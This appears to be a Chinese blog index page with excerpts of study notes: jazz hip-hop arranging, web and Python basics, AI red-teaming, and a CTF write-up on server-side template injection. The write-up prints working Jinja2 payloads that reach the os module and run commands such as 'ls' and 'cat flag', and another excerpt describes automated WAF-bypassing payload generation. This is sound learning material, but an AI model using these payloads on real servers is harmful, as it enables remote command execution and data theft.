Jazz hiphop-编曲手记
Jazz Hiphop-编曲手记 Jazz Rap,也称Jazz Hop(在日本则称为“Jazzy Hip Hop”),是一种受爵士乐启发而来的嘻哈风格。爵士说唱的创作方式多种多样,既可以使用原声乐器,也可以使用采样器和合成器等电子元素。一些创作者会选择现场乐队伴奏,而另一些则倾向于更传统的DJ伴奏方式。 从 20 世纪 80 年代末开始,爵士说唱在嘻哈音乐界崭露头角,许多最受赞誉的嘻哈音乐制作人都发行过深受爵士乐影响的曲目。 需要说明的是,JazzHiphop营造的是一种慵懒氛围,低压力,高循环,所以不必弄得很华丽 下面按我个人的制作习惯,拆解每一个声部的编写逻辑,分开日系 Jazzy Hip Hop 与 Old School Jazz Rap 两条路线来讲 鼓Jazz Hiphop的鼓组是Boom-Bap基础鼓组与爵士律动的融合,突出其Swing感和相对温暖的音色质感,BPM通常在80-95之间(当然也有一种说法BPM 81是最为轻松的)。 据我个人习惯,我们先来看Snare,通常来讲,Snare Drum分别放在小节的二、四拍。这里需要提及的是力度,军鼓的力度可以是100...
2_week
焚靖 搬运焚靖自带的howitworks.md 总览焚靖使用自研算法动态生成语法树,从而生成payload 焚靖会先测试页面,拿到WAF页面的哈希,并据此生成payload,其中重点是生成表达式: 在用户指定生成目标后,焚靖会以深度优先的方式递归展开生成目标为一系列更小的节点,从而生成一棵语法树(大概算是,我还没学编译原理)并将语法树转换成payload 对于每一次展开,焚靖会测试展开结果是否可以通过WAF,如果可以就将展开结果返回,否则更换另一种展开方式。 生成表达式比如说有两个生成字符串的规则: 直接使用字符串的字面量:"abcd" 将字符串拼接在一起:"a""b""c""d" 将这两个规则写成表达式后如下所示: 12345def gen_string_1(value): return '"' + value + '"' # 这里是演示,暂时不处理转义def gen_string_2(value): ...
AI-red Learning Notes - 1
学习路径理解AI大模型与Prompt工程学说Prompt质量好坏直接决定模型输出的效果 大模型架构决定模型处理数据类型与数据复杂程度 通过微调模型算法决定知识密度、计算效率等 传统网络安全基础知识、编程语言基础、Vibe Coding常见的网络威胁(木马,DDOS,系统入侵) Web安全基础(SQL、XSS、RCE、CSRF、Upload等) 认识传统网络安全与AI安全的区别(威胁类型,复杂程度,攻击面,关联性,可解释性,数据隐私等) Python基础和简单的自动化:https://www.icourse163.org/course/NJUPT-1472343162 尝试利用大模型进行Vibe Coding:https://github.com/2025Emma/vibe-coding-cn 机器学习基础、数学基础、深度学习基础 我真的能学到这里吗 LLM、推理机制、强化学习、Transformer架构、大语言模型应用、大模型训练流程与优化硬件(GPU、TPU、FPGA、ASIC、边缘计算硬件)AI自身安全学习路线(OWASP Top 10)提示词注入攻击(AI界的SQL注入)
1_week(SSTI-WP)
[HNCTF 2022 WEEK]ez_SSTIpayload:?name={{config.__class__.__init__.__globals__['os'].popen('cat flag').read()}} 思路: /?name={{6*6}}测出SSTI注入点参数是name /?name={{config.__class__.__init__.__globals__['os'].popen('ls').read()}}爆表,出现app.py和flag ?name={{config.__class__.__init__.__globals__['os'].popen('cat flag').read()}}获取flag 但是我一开始是这样做的: /?name={{6*6}}...
0_week
Python基础 python的核心编程思想就是面向对象(把需要操作的每个东西,当作独立的对象) 对象的基本特性(封装、多态、继承、抽象):封装把属性、方法打包进一个类里,隐藏内部复杂逻辑,只对外提供简单调用接口,不让外部随便乱改内部数据。 多态不同的子类,调用同名方法,执行不同逻辑。(有继承;有重写;统一调动) 继承子类可以继承父类的属性和方法,还能新增自己的功能。 抽象父类只定义方法而不写具体实现,强制子类必须重写该方法。 12345from abc import ABC, abstractmethodclass Lei(ABC) @abstractmethod def XXX(self) pass SSTI SSTI服务器端模板注入,恰如SQL注入利用数据库,SSTI利用服务器模板引擎 python特性魔术属性 它的前提就是python中的任何东西(字符串、数字、列表)都是对象,而所有对象都可以向上爬取到最顶层的父类<class 'object'>,找到所有底层工具类(拿到os模块) 属性 作用 SSTI 风险 ...
基础知识-week
Web基础知识学习笔记TCP/IP协议 TCP/IP协议是针对Internet开发的一种体系结构和协议标准,其目的在于解决异种计算机网络的通信问题 TCP/IP协议由网络层的IP协议和传输层的TCP协议组成,协议采用了4层的层级结构,每一层都呼叫它的下一层所提供的协议来完成自己的需求。通俗而言:TCP负责发现传输的问题,一有问题就发出信号,要求重新传输,直到所有数据安全正确地传输到目的地。而IP是给因特网的每一台联网设备规定一个地址。 四层(从上到下): 应用层:浏览器、微信、HTTP/HTTPS、DNS 传输层:TCP、UDP(快但不可靠) 网络层:IP 地址、路由、找路 网络接口层:网线、Wi‑Fi、网卡 数据传输过程: 发送方从上到下逐层加头部: 应用层 → 传输层加 TCP 头 → 网络层加 IP 头 → 链路层加帧头 → 物理层发出 接收方从下到上逐层拆头部,最后拿到原始数据。 网络联通方法DNS解析(浏览器将网址发给DNS服务器,解析成服务器IP),建立TCP链接(三次握手),HTTP请求,服务器响应,数据传输,断开连接(...



